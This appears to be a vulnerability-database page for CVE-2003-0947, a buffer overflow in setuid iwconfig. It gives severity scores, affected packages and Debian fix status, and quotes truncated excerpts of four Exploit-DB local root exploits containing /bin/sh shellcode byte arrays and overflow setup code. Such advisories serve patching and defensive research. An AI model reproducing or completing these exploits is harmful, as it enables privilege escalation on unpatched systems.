CVE-2003-0947
published 2003-12-15CVE-2003-0947: Buffer overflow in iwconfig, when installed setuid, allows local users to execute arbitrary code via a long OUT environment variable.
PriorityP423high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
1.30%
66.8th percentile
Buffer overflow in iwconfig, when installed setuid, allows local users to execute arbitrary code via a long OUT environment variable.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | wireless-tools | — | — |
| wireless_tools_project | wireless_tools | — | — |
| wireless_tools_project | wireless_tools | — | — |
| wireless_tools_project | wireless_tools | — | — |
| wireless_tools_project | wireless_tools | — | — |
| wireless_tools_project | wireless_tools | — | — |
| wireless_tools_project | wireless_tools | — | — |
| wireless_tools_project | wireless_tools | — | — |
| wireless_tools_project | wireless_tools | — | — |
CVSS provenance
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
vendor_debian7.2LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-p4p9-5425-2328: Buffer overflow in iwconfig, when installed setuid, allows local users to execute arbitrary code via a long OUT environment variable
ghsa_unreviewed·2022-04-29
CVE-2003-0947 [HIGH] CWE-120 GHSA-p4p9-5425-2328: Buffer overflow in iwconfig, when installed setuid, allows local users to execute arbitrary code via a long OUT environment variable
Buffer overflow in iwconfig, when installed setuid, allows local users to execute arbitrary code via a long OUT environment variable.
Debian
CVE-2003-0947: wireless-tools - Buffer overflow in iwconfig, when installed setuid, allows local users to execut...
vendor_debian·2003·CVSS 7.2
CVE-2003-0947 [HIGH] CVE-2003-0947: wireless-tools - Buffer overflow in iwconfig, when installed setuid, allows local users to execut...
Buffer overflow in iwconfig, when installed setuid, allows local users to execute arbitrary code via a long OUT environment variable.
Scope: local
bookworm: resolved
bullseye: resolved
forky: resolved
sid: resolved
trixie: resolved
No detection rules found.
Exploit-DB
Wireless Tools 26 (IWConfig) - Local Privilege Escalation
exploitdb·2005-09-14
CVE-2003-0948 Wireless Tools 26 (IWConfig) - Local Privilege Escalation
Wireless Tools 26 (IWConfig) - Local Privilege Escalation
---
// (if the iwconfig executable is setuid) /str0ke
#include
#include
#include
#include
/* 45 Byte /bin/sh >> http://www.milw0rm.com/id.php?id=1169 (https://www.exploit-db.com/exploits/1169/) */
char shellcode[]=
"\x31\xc0\x31\xdb\x50\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x50\x53\x89\xe1\x31\xd2\xb0"
"\x0b\x51\x52\x55\x89\xe5\x0f\x34"
"\x31\xc0\x31\xdb\xfe\xc0\x51\x52"
"\x55\x89\xe5\x0f\x34";
int main(int argc,char **argv){
char buf[96];
long esp, *addr_ptr;
unsigned long ret;
int i, offset;
unsigned long sp(void)
{ __asm__("movl %esp, %eax");}
char *prog[]={argv[1],buf,NULL};
char *env[]={"3v1lsh3ll0=",shellcode,NULL};
if (argc >= 2) {
printf("\n*********************************************\n");
printf(" iwc
Exploit-DB
Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (2)
exploitdb·2003-11-11
CVE-2003-0947 Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (2)
Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/8901/info
A problem has been identified in the iwconfig program when handling strings on the commandline. Because of this, a local attacker may be able to gain elevated privileges.
/*
Name: iw-config.c
Copyright: !sh2k+!tc2k
Author: heka
Date: 11/11/2003
Greets: bx, pintos, eksol, hex, keyhook, grass, toolman, rD, shellcode, dunric, termid, kewlcat, JiNKS
Description: /sbin/iwconfig - local root exploit
iwconfig manipulate the basic wireless parameters
*/
#include
#define BIN "/sbin/iwconfig"
unsigned char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x2e"
"\xcd\x80\x31\xc0\x53\x68\x77\x30\x30\x74\x89\xe3"
"\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x8
Exploit-DB
Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (1)
exploitdb·2003-10-27
CVE-2003-0947 Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (1)
Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/8901/info
A problem has been identified in the iwconfig program when handling strings on the commandline. Because of this, a local attacker may be able to gain elevated privileges.
Exploit:
/* PST_iwconfig
/sbin/iwconfig proof of concept exploit
coded by [email protected]
Ph4nt0m Security Team
http://www.ph4nt0m.net
just for fun
*/
#include
#include
#include
/* Copyright (c) Ramon de Carvalho Valle July 2003 */
/* x86/linux shellcode */
char shellcode[]= /* 24 bytes */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* push
Exploit-DB
Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (3)
exploitdb·2003-10-27
CVE-2003-0947 Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (3)
Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (3)
---
// source: https://www.securityfocus.com/bid/8901/info
A problem has been identified in the iwconfig program when handling strings on the commandline. Because of this, a local attacker may be able to gain elevated privileges.
/*
* (C) 2003 NrAziz
* polygrithm_at_hotmail[DOT]com
*/
/*
* Greetz to Mixter,gorny,rave..
*/
/*
* Description:
* iwconfig configures a wireless network interface and is similar to ifconfig
* except that iwconfig configures wireless interfaces.
* Vulnerability:
* Instead of giving the interface parameter when a large string is given
* the buffer overflows :-)...
*/
/*
* Yet another Proof Of Concept Xploit for 'iwconfig'
*/
#include
#include
#define BUFF_SIZE 98
#define RET 0xbffff
No writeups or analysis indexed.
2003-12-15
Published